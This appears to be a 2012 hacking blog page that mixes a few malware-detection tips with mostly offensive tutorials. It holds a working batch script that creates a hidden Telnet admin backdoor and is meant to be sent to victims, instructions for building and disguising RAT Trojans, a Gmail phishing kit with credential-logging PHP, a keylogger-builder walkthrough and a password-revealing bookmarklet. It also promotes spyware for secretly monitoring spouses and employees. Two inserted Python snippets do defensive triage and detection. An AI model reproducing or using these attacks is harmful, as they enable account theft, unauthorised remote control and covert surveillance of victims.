welcome

Have a new tricks fun of world!

Wednesday, 20 June 2012

Catching Malware?



1. Choosing the Best Anti Virus Solution
The first method to block viruses and other types of malware is to use 2 antivirus products, and we prefer
these antiviruses for maximum security:

1. Avira Premium Security Suite
Download: www.thesecretofhacking.com/sw/ch2/antivir.zip

2. Avast v4.8 1335 Professional Edition
Download: www.thesecretofhacking.com/sw/ch2/avast.zip

2. Using Netstat command
Use the netstat command at the DOS prompt to find unwanted open ports:
c:\> netstat -no [enter]

Active Connections
Proto  Local Address          Foreign Address      State        PID
TCP    117.196.228.240:3468   209.85.153.104:80    ESTABLISHED  2088
TCP    117.196.228.240:3482   209.85.153.100:80    ESTABLISHED  2088

Use the tasklist command to find the application that owns a PID (process ID).

To terminate the process, use: c:\> taskkill /PID 2088
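
An added example (not from the original post) that automates the netstat-to-tasklist lookup described above: it parses `netstat -ano` output (the `-a` switch also lists listening sockets), maps each PID to its image name from `tasklist /FO CSV /NH` output, and reports listeners on ports that are not on an expected list. Both sample listings are constructed, and the function names and the `expected_ports` parameter are this example's own.

```python
import csv
import io

# Constructed sample: the two rows from the listing above plus two invented
# rows (a Telnet listener and a UDP socket) to exercise the parser.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    117.196.228.240:3468   209.85.153.104:80      ESTABLISHED     2088
  TCP    117.196.228.240:3482   209.85.153.100:80      ESTABLISHED     2088
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING       1544
  UDP    [::]:5355              *:*                                    1120
"""

# Constructed sample in the format of `tasklist /FO CSV /NH`.
TASKLIST_SAMPLE = '''\
"firefox.exe","2088","Console","1","120,456 K"
"tlntsvr.exe","1544","Services","0","3,212 K"
"svchost.exe","1120","Services","0","9,880 K"
'''

def parse_netstat(text):
    """Yield one dict per socket row of `netstat -ano` output."""
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # banner, column header, or blank line
        # UDP rows have no State column; the PID is always the last field.
        state = parts[3] if len(parts) == 5 else ""
        yield {"proto": parts[0], "local": parts[1], "remote": parts[2],
               "local_port": int(parts[1].rsplit(":", 1)[1]),
               "state": state, "pid": int(parts[-1])}

def pid_names(tasklist_csv):
    """Map PID -> image name from `tasklist /FO CSV /NH` output."""
    rows = csv.reader(io.StringIO(tasklist_csv))
    return {int(row[1]): row[0] for row in rows if row}

def triage(netstat_text, tasklist_csv, expected_ports=frozenset()):
    """Return (port, pid, image) for listeners not on the expected list."""
    names = pid_names(tasklist_csv)
    return [(r["local_port"], r["pid"], names.get(r["pid"], "unknown"))
            for r in parse_netstat(netstat_text)
            if r["state"] == "LISTENING" and r["local_port"] not in expected_ports]

if __name__ == "__main__":
    print(triage(NETSTAT_SAMPLE, TASKLIST_SAMPLE))
```
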

3. Using Tools

1. Process explorer
Download URL: www.thesecretofhacking.com/sw/ch2/processexplorer.rar

2. Fport
Download URL: www.thesecretofhacking.com/sw/ch2/fport.exe

3. TcpView
Download URL: www.thesecretofhacking.com/sw/ch2/tcpview.exe

Video Demo: www.thesecretofhacking.com/vd/ch2/cs30

SPYWARE


Spyware is computer software that is installed surreptitiously on a personal computer to collect
information about a user, their computer or browsing habits without the user's informed consent.
While the term spyware suggests software that secretly monitors the user's behavior, the
functions of spyware extend well beyond simple monitoring. Spyware programs can collect
various types of personal information, such as Internet surfing habits and sites that have been
visited, but can also interfere with user control of the computer in other ways, such as installing
additional software and redirecting Web browser activity.

1. Spectersoft eBlaster
eBlaster is the most dependable, full-featured remote surveillance product available from the
world wide leader in Internet monitoring software. Robust and secure for the most demanding
businesses, yet easy for even computer novices to install and use effectively, eBlaster provides
both Instant Notification Email and Chat Alerts with Comprehensive Hourly and Daily Activity
Reports to give you the power and control to:
Record PC Activity, Including:

• Emails sent and received
• Both sides of Chats and Instant Messages
• Web Sites visited
• Sensitive Words and Phrases
• Every Keystroke typed
• Logon/Logoff activity

Download url: www.thesecretofhacking.com/sw/ch2/eblaster.rar

2. Buddy Spy
Buddy Spy allows you to monitor and keep track of what other Yahoo Messenger! users are doing,
even if they are in Invisible or Stealth Mode. The program shows if the user is online, what chat
room they are in (if any) and if their web cam is online. It is able to do this by connecting to Yahoo!
Messenger's servers and using its YMSG protocol. Sending carefully crafted packets, and listening to
their responses.


Download URL: www.buddy-spy.com



3. Real Spy Monitor 2.90 Portable

Real Spy Monitor can monitor all PC activity including keystrokes typed, web sites visited,
windows opened, program executed, screen snapshots, files/docs accessed and more. It can also
record instant messenger conversations including AOL, ICQ, MSN, AIM, Yahoo Messenger,
and capture web mail content from MSN, Hotmail, and Yahoo. The program can run in semi-stealth
mode (visible in Task Manager) and automatically send logs to a specified email address.
Additional features include screenshot capture and content filtering. The program does not
include any documentation. Because it is sold commercially, most anti-virus vendors do not
detect them. The most common form of a commercial monitoring tool comes in the form of a
keystroke logger, which intercepts keystrokes from the keyboard and records them in some form
of a log. This can then be sent to whoever installed the keystroke logger, or keylogger, onto the
machine.


Worried about how your PC is being used? Want to keep tabs on your children, spouse,
employees? Need to Prevent your children or employee from some application or web sites?
Real Spy Monitor is the full solution for you.



For example, you can use Real Spy Monitor to :
- Monitor Keystrokes typed, Websites visited, Windows viewed, Program executed, Screen
snapshots, Files/Docs accessed.
- Log Internet Chat conversation including AOL/ICQ/MSN/AIM Instant Messengers
- Spy Web Mail Content including MSN/HotMail, Yahoo! Mail
- Prevent your children or employee from some application or websites that include special
keywords.
- When you leave your PC, record your PC actions and send them through email delivery at
set times.


Download URL: www.thesecretofhacking.com/sw/ch2/realspy.rar


You can Download Many Applications free of cost from:

www.ddl2.com

ROOTKIT


A rootkit, like a Trojan, is also a virus used for remote access to a system. A rootkit is very powerful
compared to a Trojan because it operates at the kernel level of the operating system,
which makes it hard to detect and delete.
A rootkit is invisible in Task Manager because it hides itself.

Download Rootkits:

http://www.packetstormsecurity.org/UNIX/penetration/rootkits/

If you want to protect your system from rootkits, use Rootkit Hunter.

How to create Trojan virus with help of Lost door?


1. For LAN(Local area Network)
2. For WAN(Internet)
1. For LAN:
Open Lost door click on Create server button and then a dialog box appears where you
mention server own ip address---then…create)))) then server.exe will be created on lost door
folder .. then send this exe to target system for remote control.
For establishing the connection from server to victim.
Start your server>> just click start listen Button.
To control the victim system, right click and connect..

Video Demo: www.thesecretofhacking.com/vd/ch2/cs22

2. For WAN(Internet)
The Lost door has limitation for WAN, where our computer needs direct internet connection.
We can infect many remote users with help of email, orkut, chat (After download server.exe
that was created by Lost door).
When we create a server.exe our clients can communicate one time because our internet
service provider provides dynamic ip address .So to overcome this problem we sign up with
www.no-ip.com and provide static DNS for dynamic IP address.
Click No-Ip FREE: For Create a free hostname to point to your dynamic IP. (try now)
and fill the form and mention your email address and password and after add a host.
and download a client for change ip record on dns so that we mention hostname : ex:
sprithunter008.no-ip.biz .
use this host name in create a server address tab.


Video Demo: www.thesecretofhacking.com/vd/ch2/cs23

2. Net BUS Pro:
NetBus 2.0 Pro", (often just called "NetBus 2.0") the latest version of this well known backdoor
program, was announced on the homepage of C.F. Neikter for February 1999 - and was
published on February 19th. The latest version "NetBus 2.01 Pro" was published on April 5th. You can
download the setup-file of "NetBus 2.01 Pro" from this server.
"NetBus 2.0 Pro" was completely re-written and re-designed. It now has increased features and is
called "a remote administration and spy tool".

Download: http://www.netbus.org/

Note:
Free edition of Lost door and netbus can be detected from easily as virus so purchase private
edition of lost door and netbus for undetectable version, if you do not want to purchase private
edition, do hexa editing of server.exe.

Video: www.thesecretofhacking.com/vd/ch2/cshexa

We can create Trojan viruses with help of Trojan builders(RAT):


Best tools to create own Trojan (client) part and to control all infected machines are:
1. Lost door v3.0 Stable*
2. NetBus 2.0 Pro
1.Lost Door : Lost door is a remote administration tool for Microsoft Windows operating
systems. You can control and monitor remote computer easily and view what user does. Illegal
usage of this software is not allowed. Coder and related site is not responsible for any abuse of
the software.

Download: http://www.lostdoor.cn
Download: www.thesecretofhacking.com/sw/ch2/lostdoor.rar

Features:
[+] Reverse Connection
[+] Webcam Shot
[+] Date& time Manger
[+] printer
[+] Control pannel
[+] Pc control
[+] Exucutor
[+] Dos command
[+] Windows manager
[+] Screen Shot
[+] Remote server manager
[+] Server remover
[+] Ip Graber
[+] Server Downloader
[+] Icon Changer
[+] Audio Streaming
[+] Encrypt Settings
[+] Volume Control
[+] Connection Logs
[+] Instaled Appliction
[+] Infect All USB
[+] Multilanguage
[+] Invisible in Searching Files
[+] Services Viewer
[+] Remote passwords
[+] MSN Controler
[+] Remote Shell
[+] Chat with server
[+] Send fake messages
[+] files manager
[+] Find files
[+] Change remote screen resolution
[+] Information about remote computer
[+] Clipboard manager
[+] IE options
[+] Running Process
[+] Online keylogger
[+] Offline keylogger
[+] Fun Menu
[+] Remote Nat viewer
[+] Rmote Resotr Manager
[+] Added Some Graphics
[+] Some minor Bugs fixed
[+] Some Forms Has Been Modified
[+] News Navigator was Add

TROJAN


A Trojan horse is also a type of virus, used to control a remote machine without the system
owner's knowledge. A Trojan has two parts: 1. server and 2. client. The server handles the connections of all infected remote
computers, and the client is used to infect the victim's computer system. Every Trojan has an
associated port number for communication over the Internet or a LAN.

Video Demo: www.thesecretofhacking.com/vd/ch2/cs21

Telnet Trojan Target : All windows XP machines.

Features: Fully undetectable for all antiviruses.
---------------------------------------------------------------------------------------------------------------------
echo off
sc config TlntSvr start= auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user leoimpact /add
net user leoimpact leo123
net localgroup administrators leoimpact /add
exit


Write the above code in the notepad and save as myvirus.bat and send it through email, pen
drive, etc to other system for remote control.

Action: After executing the above script a user leoimpact is created and its password is: leo123 and
then telnet port will open with full administrative rights.

Note: The limitation of the above script is that the user will be visible on the target system. But
we can hide the user with help of downloading and executing the

www.thesecretofhacking.com/sw/ch2/hide.reg

This script has another limitation which shows a prompt which may caution the target system
user but we can hide prompt window with help of BAT to EXE converter.
[Download link: www.thesecretofhacking.com/sw/ch2/bat.zip ]

How to Connect Remote Machine:
C:\> Telnet remotemachineipaddress [enter]
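
The script above is quiet to antivirus because every line is a built-in Windows command, but each command leaves a command line that process-creation logging can record. An added example (not from the original post) of detection rules for exactly those commands, correlating account creation with the Administrators group addition; the rule names, function names and the last two sample lines are this example's own, and it assumes command lines are being collected from the host.

```python
import re

# The first five command lines are the ones in the script above; the last two
# are constructed (a benign query and an account that never becomes admin).
SAMPLE_CMDLINES = [
    "sc config TlntSvr start= auto",
    "sc start TlntSvr",
    "tlntadmn config sec=-NTLM",
    "net user leoimpact /add",
    "net localgroup administrators leoimpact /add",
    "sc query TlntSvr",
    "net user helpdesk /add",
]

RULES = [
    ("telnet_service_enabled",
     re.compile(r"\bsc(\.exe)?\s+(config|start)\s+tlntsvr\b", re.I)),
    ("telnet_ntlm_disabled",
     re.compile(r"\btlntadmn(\.exe)?\s+config\b.*\bsec=-ntlm\b", re.I)),
    ("local_user_created",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+(?P<user>[^\s/]\S*)(\s+\S+)?\s+/add\b", re.I)),
    ("added_to_admins",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+(?P<user>\S+)\s+/add\b", re.I)),
]

def detect(cmdlines):
    """Return (rule_name, username_or_None, cmdline) for every rule hit."""
    hits = []
    for line in cmdlines:
        for name, rx in RULES:
            m = rx.search(line)
            if m:
                hits.append((name, m.groupdict().get("user"), line))
    return hits

def backdoor_accounts(hits):
    """Accounts that were both created and added to Administrators."""
    created = {u.lower() for n, u, _ in hits if n == "local_user_created"}
    admins = {u.lower() for n, u, _ in hits if n == "added_to_admins"}
    return sorted(created & admins)

def severity(hits):
    """High when a new admin account coincides with Telnet being enabled."""
    names = {n for n, _, _ in hits}
    high = backdoor_accounts(hits) and "telnet_service_enabled" in names
    return "high" if high else ("medium" if names else "none")

if __name__ == "__main__":
    print(severity(detect(SAMPLE_CMDLINES)), backdoor_accounts(detect(SAMPLE_CMDLINES)))
```
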

Saturday, 16 June 2012

Example how to create gmail phishing page.




Step 1.
Go to
http://gmail.com
Click File>Save Page As... or Ctrl+ S and save page.


Once you saved, rename ServiceLogin.htm to index.htm so when you upload it to a web
host and someone goes to your link, the index page is the first page that
shows up.

Step 2.
Open text editor and add this code:
PHP Code:
<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle fopen("logs.txt""a");
foreach($_POST as $variable => $value) {
 fwrite($handle$variable);
 fwrite($handle"=");
 fwrite($handle$value);
 fwrite($handle"\r\n");
}
fwrite($handle"\r\n");
fclose($handle);
exit;
?>
Save it as mail.php

Now create simple text document and name it logs.txt
Open logs.txt and this:

Code:
ltmpl=default
ltmplcache=2
continue=http://mail.google.com/mail/?
service=mail
rm=false
Email=victim@gmail.com
Passwd=victimpassword
rmShown=1
signIn=Sign in

Step 3.
Open index.htm with text editor and find this line:
Change it to this and save it:
PHP Code:
 <form id="gaia_loginform" action="mail.php" method="post"

Step 4.
By now you will have 4files
Upload them all to your hosting
And you are done!

Use Gmail as a Hard Drive



 Gmail Drive creates a virtual file system around your Google Mail account, allowing you to use Gmail as a storage medium.


Gspace
 Gspace is a Firefox plugin that allows you to use your Gmail account for online storage. File extensions are not an issue; you can upload any type of file which includes music files to stream directly with this Firefox extension.

Hack Gmail Account password with Key Logger



First Download Rin Logger from http://goo.gl/ruV2J Run the keylogger file on your pc and click on “Create new

Now, enter the information as follows: Email address: your email address (gmail recommended) Account Password: Password of your Email address. Keylogger Recipients: Enter your Email address
Click on next

Now Enable the Attach Screenshots by hitting on it. Enter the duration (time in minutes) to receive email Key logs. After that hit "verify now” If you get a message saying verified, your good to go, click next

Now enable the “Install Keylogger” by clicking on it. Name the file anything you want and select Installation path as “Application Data”, click next

Click on Next
Now, “Enable Website Viewer” by clicking on it.
 Click on Next option.
Now, Enable the “Enable File Binder”.
Click on next.

Now Enable the “Steal Password
Click on Next

Fill all the information by yourself.
And click on next.

Now, hit on “Save As” and select the location where you want to save your keylogger server file. And click on “Compile Server”. Now Compile has been done.

You have successfully created a keylogger server file. Now, simply send this file to your victim via email, once the victim runs our keylogger, we will key logs every 10 min via email.

How to View Hidden Password behind ****

You can use this script when someone has checked the "remember me" button in the login form of any website, to reveal the password from that saved asterisk or encrypted password. After opening the web page, paste the JavaScript given below in the address bar and hit Enter.


javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j) %20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i) %20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22) %20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if %20(s)%20alert(%22Passwords%20in%20forms%20on%20this %20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are %20no%20passwords%20in%20forms%20on%20this %20page.%22);})();